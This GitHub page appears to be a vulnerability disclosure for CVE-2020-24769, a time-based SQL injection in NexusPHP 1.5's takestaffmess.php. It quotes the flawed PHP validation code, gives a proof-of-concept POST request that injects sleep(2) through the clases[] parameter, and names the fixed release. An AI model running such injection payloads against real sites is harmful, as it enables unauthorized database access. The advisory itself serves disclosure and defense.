Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2020-24769

Need get the administrator's identity to complete the attack.

Affected software: NexusPHP 1.5

Software Download Link: http://sourceforge.net/projects/nexusphp/

fixed version: nexusphp v1.6.0-beta2 https://github.com/xiaomlove/nexusphp/releases

Github Repository https://github.com/xiaomlove/nexusphp

Vulnerability details

takestaffmess.php:line 16

$updateset = $_POST['clases'];
if (is_array($updateset)) {
	foreach ($updateset as $class) {
		if (!is_valid_id($class) && $class != 0)
			stderr("Error","Invalid Class");
	}
}else{
	if (!is_valid_id($updateset) && $updateset != 0)
		stderr("Error","Invalid Class");
}
$subject = trim($_POST['subject']);
$query = sql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")");

Although the source code uses the is_valid_id function to check the contents of the clases but because of the php type conversion when the class is non-numeric when compared to zero will get an equal result and thus is_valid_id is invalid.

exploit:

POST /takestaffmess.php HTTP/1.1
Host: localhost
Cookie: administrator_cookies
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

clases[]=sleep(2)&msg=1&receiver=1&returnto=&sender=self&subject=1

clases[]=sleep(2)&msg=1&receiver=1&returnto=&sender=self&subject=1

The return will be delayed for 2 seconds

clases[]=sleep(0)&msg=1&receiver=1&returnto=&sender=self&subject=1

The return will be delayed for 0 seconds